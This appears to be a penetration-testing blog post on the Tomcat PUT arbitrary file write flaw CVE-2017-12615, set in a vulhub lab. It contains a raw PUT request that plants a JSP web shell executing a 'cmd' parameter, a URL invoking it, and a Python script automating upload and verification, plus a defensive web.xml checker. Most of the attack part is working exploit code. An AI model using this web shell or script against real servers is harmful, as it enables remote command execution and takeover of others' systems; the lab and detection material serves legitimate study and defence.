Exploitation: Tomcat Arbitrary File Write
This post was last updated 420 days ago; the information in it may have developed or changed since then.

:::info
💘 Full penetration-testing workflow:
Information gathering – Vulnerability discovery – Vulnerability 👣 exploitation – Privilege escalation – Tunnel setup – Internal network penetration – Lateral movement – Post-exploitation
:::

CVE-2017-12615

📚 Test environment

The vulhub lab environment for CVE-2017-12615.

Start the environment with docker-compose.

Access test (reference: https://www.yuque.com/u2164633/eww48f/rhgirguw8myq83n5)

📚 Vulnerability principle

In Tomcat's configuration file conf/web.xml the readonly parameter is set to false, so an HTTP PUT request can write arbitrary files to the web root.

📚 Affected versions

  • Tomcat 7.0.0 – 7.0.81

📚 PoC example

```http
PUT /shell.jsp/ HTTP/1.1
Host: 192.168.225.135:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 200

<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a = in.read(b)) != -1){ out.println(new String(b));}%>
```

![image.png](https://cdn.nlark.com/yuque/0/2023/png/2654953/1700479270616-3d386283-8b27-4bf4-8b73-b36e6562500f.png#averageHue=%23faf9f9&clientId=u780351bd-2e0e-4&from=paste&height=380&id=uf1bceb15&originHeight=475&originWidth=1919&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=80728&status=done&style=none&taskId=u9bae0fbc-ad39-488c-82fe-1f7a9cca577&title=&width=1535.2)
#### Accessing the created file
http://192.168.225.135:8080/shell.jsp?cmd=whoami
![image.png](https://cdn.nlark.com/yuque/0/2023/png/2654953/1700479356931-fea60c1d-d6ff-401f-98fa-68157f01b12e.png#averageHue=%23bcc17f&clientId=u780351bd-2e0e-4&from=paste&height=192&id=u932acd2e&originHeight=240&originWidth=1920&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=22931&status=done&style=none&taskId=uad31264c-54f3-46b4-b56f-4f7b192acd5&title=&width=1536)
### ⚠️ Problem source
conf/web.xml
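To check a Tomcat instance for this misconfiguration, here is an added example (not code from the original post) that parses conf/web.xml and reports whether the DefaultServlet will accept PUT. The two web.xml fragments are constructed: the weak setting from this post beside the corrected one; the parameter-parsing rule mirrors Tomcat's Boolean.parseBoolean.

```python
import xml.etree.ElementTree as ET

DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"

# Constructed sample: the weak setting described in this post (readonly=false) ...
WEAK_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>
"""

# ... and the corrected one (readonly=true, which is also Tomcat's default when the parameter is absent)
HARDENED_WEB_XML = WEAK_WEB_XML.replace("<param-value>false</param-value>", "<param-value>true</param-value>")


def _local(tag):
    """Strip the namespace ElementTree prefixes onto tags ('{ns}servlet' -> 'servlet')."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _text(elem, name):
    found = _children(elem, name)
    return (found[0].text or "").strip() if found else ""


def default_servlet_writable(xml_text):
    """True if the DefaultServlet accepts PUT/DELETE (readonly is not true),
    False if it is read-only, None if no DefaultServlet is declared."""
    root = ET.fromstring(xml_text)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet" or _text(servlet, "servlet-class") != DEFAULT_SERVLET:
            continue
        for param in _children(servlet, "init-param"):
            if _text(param, "param-name") == "readonly":
                # Tomcat reads this with Boolean.parseBoolean: only "true" (case-insensitive)
                # keeps the servlet read-only; any other value ("false", "0", "no") makes it writable
                return _text(param, "param-value").lower() != "true"
        return False  # parameter absent: Tomcat defaults to read-only
    return None


if __name__ == "__main__":
    for name, xml in (("weak", WEAK_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        print(f"{name}: DefaultServlet writable = {default_servlet_writable(xml)}")
```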
## Exploitation
### V1.0
```python
'''
CVE-2017-12615

📚 Vulnerability principle
In Tomcat's configuration file conf/web.xml the readonly parameter is set to false,
so an HTTP PUT request can write arbitrary files.

📚 Affected versions
● Tomcat 7.0.0 - 7.0.81

📚 PoC example
PUT /shell.jsp/ HTTP/1.1
Host: 192.168.225.135:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 200

<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a = in.read(b)) != -1){ out.println(new String(b));}%>

'''

from urllib.parse import urljoin
import requests
import time
import datetime
from fake_useragent import UserAgent
from rich import print as rprint

ua = UserAgent()


def get_time():
    return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")


def cve_2017_12615(url, payload_file):
    # payload_file is passed in explicitly instead of being read from a global,
    # so the function also works when imported rather than run as a script
    payload_url = urljoin(url, payload_file)
    headers = {
        'User-Agent': ua.random
    }

    payload_body = (r'<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a = in.read(b)) != -1){ out.println(new String(b));}%>')

    # Same request as the PoC above: PUT with a trailing '/', then give Tomcat a moment
    response = requests.put(payload_url + '/', data=payload_body, headers=headers)
    time.sleep(3)

    # Request the written file to confirm it is served
    payload_test = {
        'cmd': 'whoami'
    }
    response = requests.get(payload_url, params=payload_test)

    if response.status_code == 200:
        rprint("[[bold green]" + get_time() + "[/bold green]] [[bold green]Success[/bold green]] > [bold yellow]" + "CVE-2017-12615 vulnerability found" + "[/bold yellow]")
    else:
        # closing tag fixed: the original closed [bold red] with [/bold green]
        rprint("[[bold red]" + get_time() + "[/bold red]] [[bold red]Error[/bold red]] > [bold yellow]" + "Not vulnerable" + "[/bold yellow]")


if __name__ == '__main__':
    url = 'http://192.168.225.135:8080/'
    payload_file = 'shell5.jsp'
    cve_2017_12615(url, payload_file)
```


The sea of learning is boundless; turn back and the shore is there. --- hola